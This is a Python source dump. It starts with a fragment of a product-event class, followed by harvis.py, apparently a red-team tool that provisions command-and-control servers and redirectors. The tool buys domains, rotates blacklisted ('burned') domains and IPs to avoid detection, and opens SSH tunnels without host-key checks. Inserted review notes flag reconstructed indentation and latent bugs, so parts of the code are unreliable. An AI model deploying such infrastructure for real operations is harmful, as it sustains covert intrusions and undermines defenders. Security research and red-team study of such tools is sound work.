                if(not seller in data["sellers"]):
                    self.trigger("seller_removed", seller, data)
            save_cache(product_id, data)

    # Event programming
    def on(self, event_name : str, callback : any):
        # Register a callback; unknown event names are silently ignored.
        if(event_name in self._events):
            self._events[event_name].append(callback)

    # TO DO:
    # Improve argument passing
    def trigger(self, event_name : str, args = None, product = None):
        # Invoke all callbacks registered for event_name with (args, product).
        if(event_name in self._events):
            event = self._events[event_name]
            for callback in event:
                callback(args, product)
harvis.py
import requests
import time
from colors import bcolors
import threading
import random
import json
import os
import subprocess
import sys
from os import chmod
from Crypto.PublicKey import RSA
import logging
import paramiko
import config
from threading import Thread
from namecheap import Api
import redirect_setup
import c2_setup
import apivoid_handler
import namecheap_handler
import backup_handle
import backup
import json

# NOTE(review): this file was recovered from a newline-stripped extraction;
# indentation/nesting has been reconstructed from token order and should be
# verified against the original Harvis source.

log = {}
message_queu = {}
#action 1 = redirector issue
#action 2 = c2 issue
#aciont 3 = domain pool issue
#action 4 = API Void credit issue
domains_types = {}       # haul name -> ordered list of domains assigned to it
domains = []             # all purchased domains (pool)
domains_in_use = []      # domains currently assigned to a live redirector
api = None #api object
#temporary list to keep droplets
#waiting for migration
temp_c2_list = {}
temp_redirects = {}
burned_domains = []
redirects = {}           # haul name -> {"id","ip","state",...} redirector droplet
c2_list = {}             # haul name -> {"id","ip","state",...} C2 droplet
found_keys = []
digital_ocean_token = config.digital_ocean_token
threads = []
req_number = 0
backup_restored = False
c2_mythic = 1
c2_covenant = 2
key_gb = ""              # DigitalOcean ssh-key id used for all droplets


def set_droplets_key():
    """Generate an RSA keypair on disk and register the public half as a
    DigitalOcean SSH key; stores the resulting key id in global key_gb."""
    global key_gb
    key = RSA.generate(2048)
    with open(os.getcwd() +"/private.pem", 'wb') as content_file:
        chmod(os.getcwd() +"/private.pem", 0o600)
        content_file.write(key.exportKey('PEM'))
    pubkey = key.publickey()
    with open(os.getcwd() +"/private.key", 'wb') as content_file:
        content_file.write(pubkey.exportKey('OpenSSH'))
    f_pb_key = open(os.getcwd() +"/private.key", "r")
    public_key = f_pb_key.read()
    f_pb_key.close()
    id_droplet_gb = ""
    #you have to get the image_id of your snapshot already configured to work as a proxy
    create_ssh_key = "curl -X POST -H 'Content-Type: application/json' -H 'Authorization: Bearer "+digital_ocean_token+"' -d '{\"name\":\"Harvis\",\"public_key\":\""+str(public_key)+"\"}' \"https://api.digitalocean.com/v2/account/keys\""
    result_creation_keys = subprocess.Popen(create_ssh_key, shell=True, stdout=subprocess.PIPE).stdout
    key = result_creation_keys.read()
    key_dict = json.loads(key)
    key_gb = str(key_dict["ssh_key"]["id"])


def kill_process_like(command):
    # NOTE(review): the `command` argument is ignored; this always kills
    # 'ssh -o' processes.
    os.system("pkill -f \"ssh -o\"")


def generate_image_from_snapshot(key_gb):
    """Create a new Ubuntu droplet (tagged with config.username) via the
    DigitalOcean API, retrying until the API accepts (HTTP 202).
    Returns the raw JSON response body."""
    key_gb = str(key_gb)
    worked = False
    while worked == False:
        try:
            headers = {
                'Content-Type': 'application/json',
                'Authorization': 'Bearer '+digital_ocean_token,
            }
            data = '{"name":"Harvis","region":"nyc1","size":"s-2vcpu-2gb","image":"ubuntu-20-04-x64","ssh_keys":['+key_gb+'],"backups":false,"ipv6":true,"user_data":null,"private_networking":null,"volumes": null,"tags":["'+config.username+'"]}'
            response = requests.post('https://api.digitalocean.com/v2/droplets', headers=headers, data=data)
            status = response.status_code
            while status != 202:
                response = requests.post('https://api.digitalocean.com/v2/droplets', headers=headers, data=data)
                status = response.status_code
                time.sleep(2)
            worked = True
        except Exception as e:
            time.sleep(3)
    return response.content


def get_droplet(id_droplet):
    """Fetch a droplet's JSON description, retrying until HTTP 200."""
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer '+digital_ocean_token,
    }
    response = requests.get('https://api.digitalocean.com/v2/droplets/'+str(id_droplet), headers=headers)
    status = response.status_code
    while status != 200:
        response = requests.get('https://api.digitalocean.com/v2/droplets/' + str(id_droplet), headers=headers)
        status = response.status_code
        time.sleep(2)
    return response.content


def del_droplet(id_droplet):
    """Delete a droplet, retrying until the API confirms (HTTP 204)."""
    id_droplet = int(id_droplet)
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer '+digital_ocean_token,
    }
    response = requests.delete('https://api.digitalocean.com/v2/droplets/' + str(id_droplet), headers=headers)
    status = response.status_code
    while status != 204:
        response = requests.delete('https://api.digitalocean.com/v2/droplets/'+str(id_droplet), headers=headers)
        status = response.status_code
        time.sleep(2)


def del_ssh(id_key):
    """Delete a registered DigitalOcean SSH key, retrying until HTTP 204."""
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer '+digital_ocean_token,
    }
    response = requests.delete('https://api.digitalocean.com/v2/account/keys/'+str(id_key), headers=headers)
    status = response.status_code
    while status != 204:
        response = requests.delete('https://api.digitalocean.com/v2/account/keys/'+str(id_key), headers=headers)
        status = response.status_code
        time.sleep(2)


def status_response(droplet):
    # True when the droplet JSON reports an 'active' status.
    dict = json.loads(droplet)
    status = dict["droplet"]["status"]
    if 'active' in status:
        return True
    else:
        return False


def ip_response(droplet, id_droplet):
    """Poll the droplet until it has a public IPv4 address and return it."""
    dict = json.loads(droplet)
    worked = False
    while worked == False:
        try:
            headers = {
                'Content-Type': 'application/json',
                'Authorization': 'Bearer ' + digital_ocean_token,
            }
            resp = requests.get('https://api.digitalocean.com/v2/droplets/' + str(id_droplet), headers=headers)
            resp_content = resp.content
            parsed = json.loads(resp_content)
            # Networks appear a little after creation; keep polling.
            while not parsed["droplet"]["networks"]["v4"]:
                resp = requests.get('https://api.digitalocean.com/v2/droplets/' + str(id_droplet), headers=headers)
                resp_content = resp.content
                parsed = json.loads(resp_content)
            for i in parsed["droplet"]["networks"]["v4"]:
                if i["type"] == "public":
                    ip = i["ip_address"]
                    worked = True
        except Exception as e:
            time.sleep(3)
            print(e)
    return ip


def id_response(droplet):
    # Extract the droplet id from a creation response body.
    dict = json.loads(droplet)
    id = dict["droplet"]["id"]
    return id


def connect_to_new_droplet(dropletip):
    """Open a background SOCKS (ssh -D) tunnel to the droplet, retrying
    until the SSH connection stops being refused/reset."""
    remote_user = 'root'
    remote_host = dropletip
    remote_port = 22
    local_host = '127.0.0.1'
    local_port = 9092
    ssh_private_key = os.getcwd() +"private.key"
    # NOTE(review): path above lacks a '/' separator (cwd + "private.key") --
    # confirm whether intentional.
    out = "Connection refused"
    err = ""
    while "Connection refused" in out or "Connection refused" in err or "Connection reset" in out or "Connection reset" in err or "Could not resolve hostname" in err or "Could not resolve hostname" in out or "No such" in out:
        try:
            remote_host = dropletip
            out = ""
            err = ""
            ssh_connect = "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -D " + str(
                local_port) + " -Nf -i " + ssh_private_key + " " + remote_user + "@" + str(remote_host)
            proc1 = subprocess.Popen(ssh_connect, shell=True)
            out, err = proc1.communicate()
            if out == None:
                out = ""
            if err == None:
                err = ""
            time.sleep(1)
            try:
                # If the local port is taken, kill stale tunnels and retry.
                if "Address already in use" in out:
                    ssh_kill = "ssh -o"
                    kill_process_like(ssh_kill)
            except Exception as msg:
                out = msg
        except Exception as e:
            print(e)


def create_new_droplet(type,type_droplet):
    """Create one droplet and register it in the matching global table:
    1=redirector, 2=C2, 3=temporary redirector, 4=temporary C2."""
    global c2_list, redirects,key_gb
    result_creation = generate_image_from_snapshot(key_gb)
    id_droplet = id_response(result_creation)
    ip_droplet = ip_response(result_creation, id_droplet)
    droplet = {"id": id_droplet, "ip": ip_droplet, "state":"ok"}
    if type_droplet == 1:
        redirects[type] = droplet
    if type_droplet == 2:
        c2_list[type] = droplet
    if type_droplet == 3:
        #temp redirect
        temp_redirects[type] = droplet
    if type_droplet == 4:
        #temp c2
        temp_c2_list[type] = droplet


def delete_remaining_infra(key_gb):
    """Delete every droplet tagged with config.username (stale infra)."""
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Bearer ' + digital_ocean_token,
    }
    response = requests.get('https://api.digitalocean.com/v2/droplets?tag_name='+config.username, headers=headers)
    remaining_droplets = json.loads(response.text)["droplets"]
    for i in remaining_droplets:
        del_droplet(i["id"])


def check_pool():
    # Warn (action4) when fewer than 3 unburned domains remain in the pool.
    # NOTE(review): this also converts the global `domains` list into a set.
    global domains
    domains = set(domains) - set(burned_domains)
    if len(domains) < 3:
        full_message = "Running out of Domains! Make sure to purchase more domains"
        message_queu["action4"].append({"message":full_message})


def check_credits():
    # Warn (action3) when the APIVoid credit estimate drops below 50.
    if float(apivoid_handler.estimated_queries.replace(",",".")) < 50:
        full_message = "You are running out of credits! Buy more APIVoid credits to avoid interruptions"
        message_queu["action3"].append({"message": full_message})


def check_haul_pools():
    # Warn (action5) for each haul holding fewer than 3 domains.
    for i in domains_types:
        if len(domains_types[i]) < 3:
            full_message = "Running out of domains at haul: "+str(i)
            message_queu["action5"].append({"message": full_message,"haul":i})


def first_creation(type, type_droplet):
    # Thin wrapper kept for readability at call sites.
    create_new_droplet(type, type_droplet)


def config_droplet(type, type_connect,c2_type):
    """SSH into a freshly created droplet and configure it.

    type_connect: 1=redirector, 2=C2, 3=temporary redirector, 4=temporary C2.
    Retries the whole configuration on any exception; failures are queued
    on action6.
    """
    logger = paramiko.util.logging.getLogger()
    hdlr = logging.FileHandler('app.log')
    formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
    hdlr.setFormatter(formatter)
    logger.addHandler(hdlr)
    logger.setLevel(logging.INFO)
    worked = False
    while worked == False:
        try:
            ssh = paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            path = os.getcwd()
            k = paramiko.RSAKey.from_private_key_file(path +'/private.pem')
            if type_connect == 1:
                ip = redirects[type]['ip']
                ssh.connect(ip, username='root', pkey=k)
                worked = True
                print("Configuring redirector")
                redirect_setup.install_redir(ssh)
                print("Setting SSL certificates... this might take a while...")
                print("Waiting DNS propagations! We will check every hour")
                domain = ""
                #TO-DOs make possible to add more types of haul
                domain = domains_types[type].pop()
                domains_in_use.append(domain)
                redirects[type]["domain"] = domain
                redirect_setup.setDNSInfo(domain,redirects[type]["ip"])
                # Poll DNS propagation every 15 minutes before certificates.
                while redirect_setup.check_propagation(ssh, c2_list, redirects, type, domain, k, ip) == False:
                    time.sleep(900)
                ssh.close()
                ssh_work = False
                while ssh_work == False:
                    try:
                        ssh.connect(ip, username='root', pkey=k)
                        ssh_work = True
                    except Exception as e:
                        print(e)
                redirect_setup.full_setup(ssh, c2_list, redirects, type, domain, k, ip)
                ssh.close()
                print("Redirectors Set")
            if type_connect == 2:
                print("Setting C2's")
                ip = c2_list[type]['ip']
                ssh.connect(ip, username='root', pkey=k)
                worked = True
                c2_setup.install_c2(ssh,c2_type)
                password = c2_setup.setup_api(ssh,ip,c2_type)
                c2_list[type]['password'] = password
                print("API KEY set")
                print("Setting Certificates")
                c2_setup.setup_certificate(ssh,type)
                print("Setting Listener Profile")
                c2_setup.setup_listener(ip,type,c2_type)
                print("All Profiles Set")
                print("You are ready to go. This is your infrastructure:")
                show_infra()
                c2_setup.firewall_rules(ssh)
                #run command
            if type_connect == 3:
                ip = temp_redirects[type]['ip']
                ssh.connect(ip, username='root', pkey=k)
                worked = True
                print("Configuring Temporary redirector")
                redirect_setup.install_redir(ssh)
                print("Setting SSL certificates... this might take a while...")
                print("Waiting DNS propagations! We will check every hour")
                domain = ""
                #TO-DOs make possible to add more types of haul
                domain = domains_types[type].pop()
                domains_in_use.append(domain)
                temp_redirects[type]["domain"] = domain
                redirect_setup.setDNSInfo(domain,temp_redirects[type]["ip"])
                while redirect_setup.check_propagation(ssh, c2_list, temp_redirects, type, domain, k, ip) == False:
                    time.sleep(900)
                ssh.close()
                ssh_work = False
                while ssh_work == False:
                    try:
                        ssh.connect(ip, username='root', pkey=k)
                        ssh_work = True
                    except Exception as e:
                        print(e)
                redirect_setup.full_setup(ssh, c2_list, temp_redirects, type, domain, k, ip)
                ssh.close()
                print("Redirectors Set")
            if type_connect == 4:
                print("Setting Temporary C2's")
                ip = temp_c2_list[type]['ip']
                ssh.connect(ip, username='root', pkey=k)
                worked = True
                c2_setup.install_c2(ssh,c2_type)
                c2_setup.setup_api(ssh, ip,c2_type)
                print("API KEY set")
                print("Setting Listener Profile")
                c2_setup.setup_listener(ip,type,c2_type)
                print("All Profiles Set")
                print("You are ready to go. This is your infrastructure:")
                show_infra()
                c2_setup.firewall_rules(ssh)
                #run command
        except Exception as err:
            print(err)
            time.sleep(10)
            logging.debug(err)
            logging.info('Error connecting to Host')
            full_message = "Error in Droplet creation: "+str(err)
            message_queu["action6"].append({"message": full_message})


def update_operation(domains_brn, c2_brn, redirects_brn, domains_in_use, c2_list, redirects):
    """Translate APIVoid burn-check results into user-facing messages on the
    message queue, then run the pool/credit/haul health checks."""
    #check all burned domains, c2 ips, redirect ips
    if bool(domains_brn):
        full_message = ""
        for i in domains_brn:
            full_message = full_message +"[+] Domain burned: "+i["domains"] +"\n"
            for j in i["blacklist_list"]:
                full_message = full_message +"\t Caught by: "+j["engine"]+". Reference: "+j["reference"] +"\n"
            object_burned = ""
            for k in redirects:
                if redirects[k]["domain"] == i["domains"]:
                    object_burned = redirects[k]
                    if object_burned not in burned_domains:
                        burned_domains.append(redirects[k]["domain"])
            message_already_in = False
            if object_burned:
                for m in message_queu["action1"]:
                    if m["droplet"]["ip"] == object_burned["ip"]:
                        message_already_in = True
                if message_already_in == False:
                    message_queu["action1"].append({"message":full_message, "droplet":object_burned})
                #avoid adding same message multiple times
    """
    if bool(c2_brn):
        full_message = ""
        for i in c2_brn:
            full_message = full_message + "[+] C2 IP's burned: "+i["ips"]
            for j in i["blacklist_list"]:
                full_message = full_message + "\t Caught by: "+j["engine"]+". Reference: "+j["reference"]
            object_burned = ""
            for k in c2_list:
                if c2_list[k]["ip"] == i["ips"]:
                    object_burned = c2_list[k]
            message_queu["action2"].append({"message":full_message, "droplet":object_burned})
    """
    if bool(redirects_brn):
        full_message = ""
        for i in redirects_brn:
            full_message = full_message + "[+] Redirector IP's burned: "+i["ips"]
            for j in i["blacklist_list"]:
                full_message = full_message + "\t Caught by: "+j["engine"]+". Reference: "+j["reference"]
            object_burned = ""
            for k in redirects:
                if redirects[k]["ip"] == i["ips"]:
                    object_burned = redirects[k]
            message_queu["action1"].append({"message":full_message, "droplet":object_burned})
    check_pool()#check if domain pool is running out of domains
    check_credits()#check if credits are ending apivoid
    check_haul_pools()#check if haul pools are running out of domains


def set_and_check():
    """Background worker: build the initial infrastructure (when starting
    from scratch), then loop forever checking for burned assets, saving
    backups and printing queued messages."""
    global domains_brn, c2_brn, redirects_brn, domains_in_use, c2_list, redirects,c2_mythic, domains, domains_types, burned_domains,temp_c2_list,temp_redirects,log,message_queu,key_gb
    if(backup_restored == True):
        #create redirectors
        for i in config.names:
            first_creation(i,1)
        #create c2s
        for i in config.names:
            first_creation(i,2)
        #setup redirectors
        for i in config.names:
            config_droplet(i,1,0)
        for i in config.names:
            config_droplet(i,2,0)
    while True:
        domains_brn = apivoid_handler.check_burned_domain(domains_in_use)
        c2_brn = apivoid_handler.check_burned_c2_list(c2_list)
        redirects_brn = apivoid_handler.check_burned_redirectors(redirects)
        backup_handle.save_backup(domains_types, domains, burned_domains,temp_c2_list, temp_redirects, redirects, c2_list, domains_in_use, log, message_queu,key_gb)
        update_operation(domains_brn, c2_brn, redirects_brn, domains_in_use, c2_list, redirects)
        time.sleep(config.check_infra_state)
        message_queu_print()


def damaged_components():
    """Interactive migration flow: list burned components and spin up
    temporary replacement droplets for the chosen one(s)."""
    print("[+] You have components burned")
    for i in domains_types:
        if len(domains_types[i]) == 0:
            print("You have no domains in the "+i+" haul pool.")
            print("Make sure to add at least 1 domain in the haul pool before migrating.")
            return
    print("[+] Choose component to Migrate [0 = ALL]")
    if len(message_queu["action1"]) > 0 or len(message_queu["action2"])>0:
        #find redirectors burned first
        redirects_tmp_list = []
        c2_tmp_list = []
        for i in message_queu["action1"]:
            redirects_tmp_list.append(i["droplet"]["ip"])
        for i in message_queu["action2"]:
            c2_tmp_list.append(i["droplet"]["ip"])
        #tag components with burned
        for i in redirects:
            if redirects[i]["ip"] in redirects_tmp_list:
                redirects[i]["state"] = "burned"
        # NOTE(review): loop below iterates/subscripts c2_tmp_list (a list of
        # IP strings) as if it were the c2_list dict -- likely a latent bug;
        # confirm against upstream before relying on C2 burn tagging.
        for i in c2_tmp_list:
            if c2_tmp_list[i]["ip"] in c2_tmp_list:
                c2_tmp_list[i]["state"] = "burned"
    for index,key in enumerate(redirects):
        redirect_str = ""
        c2_str = ""
        if redirects[key]["state"] == "burned":
            redirect_str = str(index+1) +f") [BURNED]"
        if c2_list[key]["state"] == "burned":
            c2_str = str(index+1+len(redirects)) + ") [BURNED]"
        print("Redirect: "+redirects[key]["ip"] +f" {bcolors.WARNING}"+redirect_str +f"{bcolors.ENDC}>>>>>>> C2: " +c2_list[key]["ip"] +c2_str)
    component = input("Component: ")
    print(f"{bcolors.WARNING}This will create a temporary droplet to replace the damaged component. Do you want yo continue?{bcolors.ENDC} {bcolors.BOLD}[Y\\n]{bcolors.ENDC}")
    option = input()
    option = option.lower()
    if option == "y":
        if int(component) == 0:
            # Migrate everything currently flagged in action1/action2.
            for i in message_queu["action1"][:]:
                for k in redirects:
                    if redirects[k]["ip"] == i["droplet"]["ip"]:
                        redirects[k]["state"] = "pending_kill"
                        first_creation(k, 3)
                        config_droplet(k,3,0)
                        first_creation(k, 4)
                        config_droplet(k, 4, 0)
                        message_queu["action1"].remove(i)
                        message_queu["action7"].append(
                            {"message": "Temporary Droplet Ready. Pending discard.", "droplet": i})
            for i in message_queu["action2"][:]:
                for k in c2_list:
                    if c2_list[k]["ip"] == i["droplet"]["ip"]:
                        c2_list[k]["state"] = "pending_kill"
                        first_creation(k, 4)
                        config_droplet(k,4,0)
                        message_queu["action2"].remove(i)
                        message_queu["action7"].append(
                            {"message": "Temporary Droplet Ready. Pending discard.", "droplet": i})
        else:
            if int(component) > len(redirects):
                # Selected index refers to a C2 entry.
                # NOTE(review): index is not reduced by len(redirects) before
                # indexing into c2_list -- verify the intended offset.
                key_list = list(c2_list)
                component_key = key_list[int(component) - 1]
                c2_list[component_key]["state"] = "pending_kill"
                comp_mod_ip = c2_list[component_key]["ip"]
                first_creation(component_key, 4)
                config_droplet(component_key, 4, 0)
                for i in message_queu["action1"][:]:
                    if i["droplet"]["ip"] == comp_mod_ip:
                        message_queu["action7"].append({"message":"Temporary Droplet Ready. Pending discard.","droplet":i})
                        message_queu["action1"].remove(i)
            else:
                # Selected index refers to a redirector; migrate its C2 too.
                key_list = list(redirects)
                component_key = key_list[int(component)-1]
                redirects[component_key]["state"] = "pending_kill"
                comp_mod_ip = redirects[component_key]["ip"]
                first_creation(component_key,3)
                config_droplet(component_key, 3, 0)
                c2_list[component_key]["state"] = "pending_kill"
                c2_mod_ip = c2_list[component_key]["ip"]
                first_creation(component_key,4)
                config_droplet(component_key,4,0)
                for i in message_queu["action1"][:]:
                    if i["droplet"]["ip"] == comp_mod_ip:
                        message_queu["action7"].append({"message":"Temporary Droplet Ready. Pending discard.","droplet":i})
                        message_queu["action1"].remove(i)
        #get component modified from message_queue
        #remove from message_queue
        #add pending_kill to message queue
    else:
        pass


def discard_components():
    """Interactive discard flow: delete droplets pending kill and promote the
    temporary replacements into the main redirects/c2_list tables."""
    print("[+] You have components pending discards")
    print("[+] Choose component to Discard [0 = ALL]")
    if len(message_queu["action7"]):
        # find components to discard
        components_temp = []
        for i in message_queu["action7"]:
            components_temp.append(i["droplet"]["droplet"]["ip"])
        for index, key in enumerate(redirects):
            redirect_str = ""
            c2_str = ""
            if redirects[key]["state"] == "pending_kill":
                redirect_str = str(index + 1) + ") [PENDING DISCARD]"
            if c2_list[key]["state"] == "pending_kill":
                c2_str = str(index + 1 + len(redirects)) + ") [PENDING DISCARD]"
            print("Redirect: " + redirects[key]["ip"] + f" {bcolors.WARNING}"+redirect_str + f"{bcolors.ENDC}>>>>>>>" + c2_list[key]["ip"] + c2_str)
    component = input("Component: ")
    print("Before discarding a component, make sure to migrate your agents to the new droplet.")
    print(f"{bcolors.WARNING}Do you want to continue?[Y\\n] [This will kill all agents in the discarded component] {bcolors.ENDC}")
    option = input()
    option = option.lower()
    if option == "y":
        if int(component) == 0:
            for i in message_queu["action1"][:]:
                for k in redirects:
                    if redirects[k]["ip"] == i["droplet"]["ip"]:
                        message_queu["action7"].remove(i)
                        del_droplet(redirects[k]["id"])
                        del_droplet(c2_list[k]["id"])
                        redirects[k] = temp_redirects[k]
                        c2_list[k] = temp_c2_list[k]
                        temp_redirects.pop(k, None)
                        temp_c2_list.pop(k, None)
            for i in message_queu["action2"][:]:
                for k in c2_list:
                    if c2_list[k]["ip"] == i["droplet"]["ip"]:
                        message_queu["action7"].remove(i)
                        del_droplet(c2_list[k]["id"])
                        c2_list[k] = temp_c2_list[k]
                        temp_c2_list.pop(k, None)
        else:
            if int(component) > len(redirects):
                # C2-only discard.
                key_list = list(c2_list)
                component_key = key_list[int(component) - 1]
                comp_mod_ip = c2_list[component_key]["ip"]
                for i in message_queu["action7"][:]:
                    if i["droplet"]["ip"] == comp_mod_ip:
                        message_queu["action7"].remove(i)
                        del_droplet(c2_list[component_key]["id"])
                        c2_list[component_key] = temp_c2_list[component_key]
                        temp_c2_list.pop(component_key, None)
            else:
                # Redirector discard: replace both redirector and its C2.
                key_list = list(redirects)
                component_key = key_list[int(component) - 1]
                comp_mod_ip = redirects[component_key]["ip"]
                for i in message_queu["action7"][:]:
                    if i["droplet"]["droplet"]["ip"] == comp_mod_ip:
                        message_queu["action7"].remove(i)
                        del_droplet(redirects[component_key]["id"])
                        del_droplet(c2_list[component_key]["id"])
                        redirects[component_key] = temp_redirects[component_key]
                        c2_list[component_key] = temp_c2_list[component_key]
                        temp_redirects.pop(component_key, None)
                        temp_c2_list.pop(component_key, None)
        # get component modified from message_queue
        # remove from message_queue
        # add pending_kill to message queue
    else:
        pass


def show_infra():
    # Print each redirector -> C2 pair plus the Mythic admin credentials.
    for i in redirects:
        print("Redirect: "+redirects[i]["ip"]+ " >>>>>>> "+"C2: "+c2_list[i]["ip"], "Credentials: mythic_admin/"+c2_list[i]["password"])


def set_apis():
    """Prompt for and update one of the three API keys on the config module
    (in-memory only; not persisted here)."""
    print("Choose API Key to set: ")
    print("1) Digital Ocean")
    print("2) Namecheap")
    print("3) APIVoid")
    option = input("Option: ")
    if int(option) == 1:
        api = input("Api key: ")
        config.digital_ocean_token = api
    if int(option) == 2:
        api = input("Api key: ")
        config.namecheap_key = api
    if int(option) == 3:
        api = input("Api key: ")
        config.apivoid_key = api


def kill_all():
    """Delete every managed droplet after confirmation.

    NOTE(review): the loops iterate dict keys (strings) and then subscript
    them with ["id"] -- this would raise; upstream likely intended
    redirects[i]["id"] / c2_list[i]["id"].  Kept verbatim for review.
    """
    print("This will kill all your droplets and exit. Do you want to continue? [Y\\n]")
    option = input()
    option = option.lower()
    if option == "y":
        for i in redirects:
            del_droplet(i["id"])
        for i in c2_list:
            del_droplet(i["id"])
    else:
        pass


def message_queu_print():
    """Print queued messages; action3-6 are one-shot (drained after printing)
    while action1/2/7 persist until handled by migration/discard flows."""
    if "action1" in message_queu:
        for i in message_queu["action1"]:
            print(i["message"])
    if "action2" in message_queu:
        for i in message_queu["action2"]:
            print(i["message"])
    if "action3" in message_queu:
        for i in message_queu["action3"][:]:
            print(i["message"])
            message_queu["action3"].remove(i)
    if "action4" in message_queu:
        for i in message_queu["action4"][:]:
            print(i["message"])
            message_queu["action4"].remove(i)
    if "action5" in message_queu:
        for i in message_queu["action5"][:]:
            print(i["message"])
            message_queu["action5"].remove(i)
    if "action6" in message_queu:
        for i in message_queu["action6"][:]:
            print(i["message"])
            message_queu["action6"].remove(i)
    if "action7" in message_queu:
        for i in message_queu["action7"]:
            print(i["message"])


def check_backup():
    """Restore all global state from a saved backup when one exists.

    Returns False when restored from backup, True when starting fresh (in
    which case stale infra is deleted and a new SSH key is registered).
    """
    global domains_brn, c2_brn, redirects_brn, domains_in_use, c2_list, redirects, c2_mythic, domains, domains_types, burned_domains, temp_c2_list, temp_redirects, log, message_queu, key_gb
    if backup.backup_saved == 1:
        bkp = backup_handle.recover_backup()
        domains_types = bkp[0]
        domains = bkp[1]
        burned_domains = bkp[2]
        temp_c2_list = bkp[3]
        temp_redirects = bkp[4]
        redirects = bkp[5]
        c2_list = bkp[6]
        domains_in_use = bkp[7]
        log = bkp[8]
        message_queu = bkp[9]
        key_gb = bkp[10]
        apivoid_handler.get_estimated_queries()
        return False
    else:
        delete_remaining_infra(key_gb)
        set_droplets_key()
        return True


def menu():
    """Main interactive menu loop (runs on its own thread); each iteration
    saves a backup, prints the menu, and dispatches one command."""
    global api, domains_types,domains,burned_domains,temp_c2_list,temp_redirects,redirects,c2_list,domains_in_use,log,message_queu
    while True:
        backup_handle.save_backup(domains_types, domains, burned_domains,temp_c2_list, temp_redirects, redirects, c2_list, domains_in_use, log, message_queu, key_gb)
        print("[+] Choose an option:")
        print("1) Buy domain")
        print("2) Move domain to a haul")
        print("3) Remove domain from haul")
        print("4) Move priority of domains in haul")
        print("5) Print Domains")
        situational_message_6 = "[No pending migrations]"
        if len(message_queu["action1"]) > 0 or len(message_queu["action2"])> 0:
            situational_message_6 = f"{bcolors.WARNING}You have burned domains/c2's/redirectors{bcolors.ENDC}"
        print(f"6) Pending Migrations "+situational_message_6)
        situational_message_7 = "[No pending discards]"
        if len(message_queu["action7"]) > 0:
            situational_message_7 = f"{bcolors.WARNING}[You have pending discards for domains/c2's/redirectors] {bcolors.ENDC}"
        print(f"7) Pending Discards "+situational_message_7)
        print("8) Show Infra")
        try:
            command = input("Select: ")
            if command == '1':
                print("0) Back")
                domain_name = input("Insert domain name: ")
                if domain_name.strip() != "0":
                    result_call = namecheap_handler.buy_domain(domain_name)
                    if result_call == False:
                        print("[+] Domain not available")
                    else:
                        print("[+] Domain successfuly acquired")
            if command == '2':
                print("[+] Select Domains to move to a haul: ")
                actual_domains = set(domains) - set(domains_in_use) - set(burned_domains)
                if len(actual_domains) > 0:
                    for index, item in enumerate(actual_domains):
                        print(str(index) + ") "+item)
                    print("1000) Back")
                    domain_option = input("Option: ")
                    if domain_option != "1000":
                        for i in domains_types:
                            if domain_option in i:
                                print("[-] Domain is already in Haul: "+i)
                                print("[-] Remove that domain from the haul to allow moving it")
                            else:
                                print("Select Haul to move: ")
                                for j in config.names:
                                    print("[+] "+j)
                                haul_option = input("Option: ")
                                actual_domains = list(actual_domains)
                                domains_types[haul_option].append(actual_domains[int(domain_option)])
                                domains.remove(actual_domains[int(domain_option)])
                else:
                    print("[+] No available domains in pool. Buy another domain")
            if command == '3':
                print("[+] Domains by Haul:")
                for i in domains_types:
                    print("Haul "+i)
                    for j in domains_types[i]:
                        print(j)
                #remove
                pass
            #change priority of domains inside haul (priority of rotation)
            if command == '4':
                print("[+] Select Haul")
                for i in domains_types:
                    print("[+] "+i)
                print("[+] 1000) Back")
                haul_option = input("Haul: ")
                if haul_option != "1000":
                    print("[+] Select domain to move priority: ")
                    if bool(domains_types[haul_option]):
                        for index, item in enumerate(domains_types[haul_option]):
                            print(str(index) +") "+item)
                        domain_option = input("Option Number: ")
                        print("[+] Select position to move the domain [Position 1 = Highest priority]: ")
                        position_option = input("Position Number: ")
                        domain_item = domains_types[haul_option].pop(int(domain_option))
                        domains_types[haul_option].insert(int(position_option)-1, domain_item)
                    else:
                        print("[-] No domains in haul")
            if command == '5':
                print("[+] Select print option: ")
                print("1) All Domains in Pool")
                print("2) All Available Domains (not burned, not in use, not in a haul)")
                print("3) All Burned Domains")
                print("4) Domains in Use")
                print("5) Domains by Haul")
                option_number = input("Option Number: ")
                if int(option_number) == 1:
                    print(domains)
                if int(option_number) == 2:
                    actual_domains = set(domains) - set(domains_in_use) - set(burned_domains)
                    print(actual_domains)
                if int(option_number) == 3:
                    print(burned_domains)
                if int(option_number) == 4:
                    print(domains_in_use)
                if int(option_number) == 5:
                    for i in domains_types:
                        print("[-] Haul "+i)
                        for k in domains_types[i]:
                            print(k)
            if command == '6':
                if "No pending migrations" in situational_message_6:
                    print("You have no pending migrations")
                else:
                    damaged_components()
            if command == '7':
                if "[No pending discards]" in situational_message_7:
                    print("You have no pending discards")
                else:
                    discard_components()
            if command == '8':
                show_infra()
            if command == '9':
                pass #add c2 profiles
            if command == '10':
                pass #start migration
            if command == '11':
                pass #edit htaccess redirector
            if command == '12':
                pass #edit c2_profile
            if command == '13':
                set_apis()
            if command == '14':
                kill_all()
        except Exception as e:
            print("Error: ")
            print(e)


def restricted_menu():
    """One-shot first-run menu used when some haul has no domains yet:
    lets the operator buy domains and distribute one domain per haul."""
    global api, domains_types, domains, burned_domains, temp_c2_list, temp_redirects, redirects, c2_list, domains_in_use, log, message_queu
    check = False
    haul_option = ""
    while check == False:
        print(f"{bcolors.OKGREEN}[+] Choose an option:{bcolors.ENDC}")
        print("1) Buy domain")
        print("2) Move domain to a haul")
        try:
            command = input(f"{bcolors.BOLD}Select: {bcolors.ENDC}")
            if command == '1':
                domain_name = input("Insert domain name: ")
                result_call = namecheap_handler.buy_domain(domain_name)
                if result_call == False:
                    print(f"{bcolors.FAIL}[+] Domain not available{bcolors.ENDC}")
                else:
                    print(f"{bcolors.OKBLUE}[+] Domain successfuly acquired{bcolors.ENDC}")
                    temp_domains = list(api.domains_getList())
                    for i in temp_domains:
                        domains.append(i['name'])
            if command == '2':
                print(f"{bcolors.BOLD}[+] Select Domains to move to a haul: {bcolors.ENDC}")
                actual_domains = set(domains) - set(domains_in_use) - set(burned_domains)
